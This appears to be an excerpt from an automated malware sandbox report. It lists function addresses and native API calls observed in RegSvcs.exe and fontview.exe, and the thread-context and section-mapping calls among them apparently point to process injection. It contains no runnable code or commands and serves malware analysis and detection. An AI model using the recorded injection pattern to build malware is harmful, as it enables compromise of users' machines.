            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402C504_2_00402C50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004025E04_2_004025E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041659E4_2_0041659E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004165A34_2_004165A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F81584_2_014F8158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014601004_2_01460100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150A1184_2_0150A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015281CC4_2_015281CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015241A24_2_015241A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015301AA4_2_015301AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015020004_2_01502000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152A3524_2_0152A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015303E64_2_015303E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147E3F04_2_0147E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015102744_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F02C04_2_014F02C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014705354_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015305914_2_01530591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015224464_2_01522446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015144204_2_01514420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151E4F64_2_0151E4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014947504_2_01494750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014707704_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146C7C04_2_0146C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148C6E04_2_0148C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014869624_2_01486962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A04_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0153A9A64_2_0153A9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147A8404_2_0147A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014728404_2_01472840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E8F04_2_0149E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014568B84_2_014568B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152AB404_2_0152AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01526BD74_2_01526BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146EA804_2_0146EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147AD004_2_0147AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150CD1F4_2_0150CD1F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146ADE04_2_0146ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01488DBF4_2_01488DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470C004_2_01470C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01460CF24_2_01460CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510CB54_2_01510CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E4F404_2_014E4F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01512F304_2_01512F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014B2F284_2_014B2F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01490F304_2_01490F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01462FC84_2_01462FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147CFE04_2_0147CFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EEFA04_2_014EEFA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470E594_2_01470E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152EE264_2_0152EE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152EEDB4_2_0152EEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152CE934_2_0152CE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01482E904_2_01482E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A516C4_2_014A516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145F1724_2_0145F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0153B16B4_2_0153B16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147B1B04_2_0147B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014770C04_2_014770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151F0CC4_2_0151F0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152F0E04_2_0152F0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015270E94_2_015270E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145D34C4_2_0145D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152132D4_2_0152132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014B739A4_2_014B739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148B2C04_2_0148B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015112ED4_2_015112ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014752A04_2_014752A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015275714_2_01527571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015395C34_2_015395C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150D5B04_2_0150D5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014614604_2_01461460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152F43F4_2_0152F43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014617EC4_2_014617EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152F7B04_2_0152F7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014B56304_2_014B5630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015216CC4_2_015216CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014799504_2_01479950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148B9504_2_0148B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015059104_2_01505910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DD8004_2_014DD800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014738E04_2_014738E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152FB764_2_0152FB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014ADBF94_2_014ADBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E5BF04_2_014E5BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148FB804_2_0148FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01527A464_2_01527A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152FA494_2_0152FA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E3A6C4_2_014E3A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151DAC64_2_0151DAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014B5AA04_2_014B5AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01511AA34_2_01511AA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150DAAC4_2_0150DAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01473D404_2_01473D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01521D5A4_2_01521D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01527D734_2_01527D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148FDC04_2_0148FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E9C324_2_014E9C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152FCF24_2_0152FCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152FF094_2_0152FF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01471F924_2_01471F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152FFB14_2_0152FFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01479EB04_2_01479EB0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B2E4F612_2_04B2E4F6
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B2442012_2_04B24420
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3244612_2_04B32446
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B4059112_2_04B40591
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A8053512_2_04A80535
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A9C6E012_2_04A9C6E0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A7C7C012_2_04A7C7C0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A8077012_2_04A80770
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AA475012_2_04AA4750
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B1200012_2_04B12000
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B341A212_2_04B341A2
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B401AA12_2_04B401AA
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B381CC12_2_04B381CC
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A7010012_2_04A70100
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B1A11812_2_04B1A118
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B0815812_2_04B08158
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B002C012_2_04B002C0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B2027412_2_04B20274
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B403E612_2_04B403E6
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A8E3F012_2_04A8E3F0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3A35212_2_04B3A352
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B20CB512_2_04B20CB5
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A70CF212_2_04A70CF2
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A80C0012_2_04A80C00
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A98DBF12_2_04A98DBF
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A7ADE012_2_04A7ADE0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A8AD0012_2_04A8AD00
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B1CD1F12_2_04B1CD1F
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3CE9312_2_04B3CE93
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A92E9012_2_04A92E90
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3EEDB12_2_04B3EEDB
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3EE2612_2_04B3EE26
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A80E5912_2_04A80E59
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AFEFA012_2_04AFEFA0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A8CFE012_2_04A8CFE0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A72FC812_2_04A72FC8
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B22F3012_2_04B22F30
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AC2F2812_2_04AC2F28
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AA0F3012_2_04AA0F30
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AF4F4012_2_04AF4F40
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A668B812_2_04A668B8
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AAE8F012_2_04AAE8F0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A8A84012_2_04A8A840
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A8284012_2_04A82840
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A829A012_2_04A829A0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B4A9A612_2_04B4A9A6
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A9696212_2_04A96962
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A7EA8012_2_04A7EA80
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B36BD712_2_04B36BD7
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3AB4012_2_04B3AB40
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3F43F12_2_04B3F43F
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A7146012_2_04A71460
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B1D5B012_2_04B1D5B0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3757112_2_04B37571
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B316CC12_2_04B316CC
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3F7B012_2_04B3F7B0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A717EC12_2_04A717EC
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3F0E012_2_04B3F0E0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B370E912_2_04B370E9
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A870C012_2_04A870C0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B2F0CC12_2_04B2F0CC
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A8B1B012_2_04A8B1B0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB516C12_2_04AB516C
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A6F17212_2_04A6F172
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B4B16B12_2_04B4B16B
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A852A012_2_04A852A0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B212ED12_2_04B212ED
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A9B2C012_2_04A9B2C0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AC739A12_2_04AC739A
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3132D12_2_04B3132D
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A6D34C12_2_04A6D34C
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3FCF212_2_04B3FCF2
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AF9C3212_2_04AF9C32
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A9FDC012_2_04A9FDC0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B37D7312_2_04B37D73
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A83D4012_2_04A83D40
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B31D5A12_2_04B31D5A
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A89EB012_2_04A89EB0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3FFB112_2_04B3FFB1
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A81F9212_2_04A81F92
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3FF0912_2_04B3FF09
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A838E012_2_04A838E0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AED80012_2_04AED800
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B1591012_2_04B15910
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A8995012_2_04A89950
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A9B95012_2_04A9B950
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AC5AA012_2_04AC5AA0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B21AA312_2_04B21AA3
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B1DAAC12_2_04B1DAAC
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B2DAC612_2_04B2DAC6
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AF3A6C12_2_04AF3A6C
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B37A4612_2_04B37A46
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3FA4912_2_04B3FA49
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A9FB8012_2_04A9FB80
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04ABDBF912_2_04ABDBF9
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AF5BF012_2_04AF5BF0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04B3FB7612_2_04B3FB76
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A41AC012_2_02A41AC0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A3AFA012_2_02A3AFA0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A3CF2012_2_02A3CF20
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A3CCF812_2_02A3CCF8
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A3CD0012_2_02A3CD00
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A4320B12_2_02A4320B
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A4321012_2_02A43210
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A575B012_2_02A575B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014B7E54 appears 109 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0145B970 appears 283 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014EF290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014DEA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014A5130 appears 58 times
            Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 04A6B970 appears 283 times
            Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 04AEEA12 appears 86 times
            Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 04AB5130 appears 58 times
            Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 04AC7E54 appears 100 times
            Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 04AFF290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040A173 NtSetContextThread,4_2_0040A173
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040A9C3 NtMapViewOfSection,4_2_0040A9C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040B293 NtDelayExecution,4_2_0040B293
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040ABF3 NtCreateFile,4_2_0040ABF3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040A383 NtResumeThread,4_2_0040A383
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00409D53 NtSuspendThread,4_2_00409D53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004285D3 NtClose,4_2_004285D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040AE23 NtReadFile,4_2_0040AE23
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040B6B3 NtAllocateVirtualMemory,4_2_0040B6B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00409F63 NtGetContextThread,4_2_00409F63
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040A7A3 NtCreateSection,4_2_0040A7A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2B60 NtClose,LdrInitializeThunk,4_2_014A2B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_014A2DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_014A2C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A35C0 NtCreateMutant,LdrInitializeThunk,4_2_014A35C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A4340 NtSetContextThread,4_2_014A4340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A4650 NtSuspendThread,4_2_014A4650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2BE0 NtQueryValueKey,4_2_014A2BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2BF0 NtAllocateVirtualMemory,4_2_014A2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2B80 NtQueryInformationFile,4_2_014A2B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2BA0 NtEnumerateValueKey,4_2_014A2BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2AD0 NtReadFile,4_2_014A2AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2AF0 NtWriteFile,4_2_014A2AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2AB0 NtWaitForSingleObject,4_2_014A2AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2D00 NtSetInformationFile,4_2_014A2D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2D10 NtMapViewOfSection,4_2_014A2D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2D30 NtUnmapViewOfSection,4_2_014A2D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2DD0 NtDelayExecution,4_2_014A2DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2DB0 NtEnumerateKey,4_2_014A2DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2C60 NtCreateKey,4_2_014A2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2C00 NtQueryInformationProcess,4_2_014A2C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2CC0 NtQueryVirtualMemory,4_2_014A2CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2CF0 NtOpenProcess,4_2_014A2CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2CA0 NtQueryInformationToken,4_2_014A2CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2F60 NtCreateProcessEx,4_2_014A2F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2F30 NtCreateSection,4_2_014A2F30
